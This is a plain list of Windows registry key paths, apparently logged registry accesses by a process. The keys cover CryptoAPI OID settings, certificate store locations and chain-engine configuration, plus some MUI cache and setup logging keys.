HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.44.3.4!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.44.3.4!7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.44.3.4!7\Name
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MUI\StringCacheSettings
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings\StringCacheGeneration
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\LanguageList
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\p2pcollab.dll,-8042
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.47.1.1!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.47.1.1!7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.47.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\qagentrt.dll,-10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.64.1.1!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.64.1.1!7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.64.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.1!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.1!7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.2!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.2!7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.2!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagMatchAnyMask
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\Root\ProtectedRoots
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\ChainEngine\Config
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableMandatoryBasicConstraints
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableCANameConstraints
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableUnsupportedCriticalExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlCountInCert
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalCountPerChain
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxUrlRetrievalByteCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalByteCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalCertCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\CryptnetPreFetchTriggerPeriodSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\EnableWeakSignatureFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\ChainCacheResyncFiletime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv\#16
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv\Ldap
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CertDllOpenStoreProv
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\Keys
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\CTLs
HKEY_CURRENT_USER\
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA\Certificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA\CRLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\CA\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\CA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\109F1CAED645BB78B3EA2B94C0697C740733031C
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\109F1CAED645BB78B3EA2B94C0697C740733031C\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\D559A586669B08F46A30A133F8A9ED3D038E2EA8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\D559A586669B08F46A30A133F8A9ED3D038E2EA8\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\FEE449EE0E3965A5246F000E87FDE2A065FD89D4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\FEE449EE0E3965A5246F000E87FDE2A065FD89D4\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs\A377D1B1C0538833035211F4083D00FECC414DAB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs\A377D1B1C0538833035211F4083D00FECC414DAB\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\CA
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\CA\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\CA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\CA\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\CA\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\CA\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\CA\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\Safer
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\Safer
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\TrustedPublisher\Safer
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\CTLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\Disallowed
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\Disallowed\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\Disallowed
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\637162CC59A3A1E25956FA5FA8F60D2E1C52EAC6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\637162CC59A3A1E25956FA5FA8F60D2E1C52EAC6\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\7D7F4414CCEF168ADF6BF40753B5BECD78375931
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\7D7F4414CCEF168ADF6BF40753B5BECD78375931\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\Disallowed
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\Disallowed\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\Disallowed
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\ProtectedRoots
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\ProtectedRoots\Certificates
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\Root\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\245C97DF7514E7CF2DF8BE72AE957B9E04741E85
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\245C97DF7514E7CF2DF8BE72AE957B9E04741E85\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7F88CD7223F3C813818C994614A89C99FA3B5247
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7F88CD7223F3C813818C994614A89C99FA3B5247\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\A43489159A520F0D93D032CCAF37E7FE20A8B419
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\A43489159A520F0D93D032CCAF37E7FE20A8B419\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BE36A4562FB2EE05DBB3D32323ADF445084ED656
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BE36A4562FB2EE05DBB3D32323ADF445084ED656\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CDD4EEAE6000AC7F40C3802C171E30148030C072
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CDD4EEAE6000AC7F40C3802C171E30148030C072\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\AuthRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\742C3192E607E424EB4549542BE1BBC53E6174E2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\742C3192E607E424EB4549542BE1BBC53E6174E2\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\85371CA6E550143DCE2803471BDE3A09E8F8770F
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\85371CA6E550143DCE2803471BDE3A09E8F8770F\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\97817950D81C9670CC34D809CF794431367EF474
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\97817950D81C9670CC34D809CF794431367EF474\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D23209AD23D314232174E40D7F9D62139786633A
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D23209AD23D314232174E40D7F9D62139786633A\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DE28F4A4FFE5B92FA3C503D1A349A7F9962A8212
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DE28F4A4FFE5B92FA3C503D1A349A7F9962A8212\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\Root\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\SmartCardRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPeople
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\TrustedPeople\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\TrustedPeople
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\TrustedPeople
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\TrustedPeople\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\TrustedPeople
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\CTLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\trust
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\trust\Certificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\trust\CRLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\trust\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\trust\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\trust
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\trust\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\trust
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\trust\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\trust
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Diagnostics
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserenvDebugLevel
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\GpSvcDebugLevel
HKEY_LOCAL_MACHINE\System\Setup
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\UrlDllGetObjectUrl
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\UrlDllGetObjectUrl
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\AuthRoot
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\LogLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\LogMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\LogMaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllImportPublicKeyInfoEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllImportPublicKeyInfoEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllConvertPublicKeyInfo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllConvertPublicKeyInfo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllVerifyCertificateChainPolicy
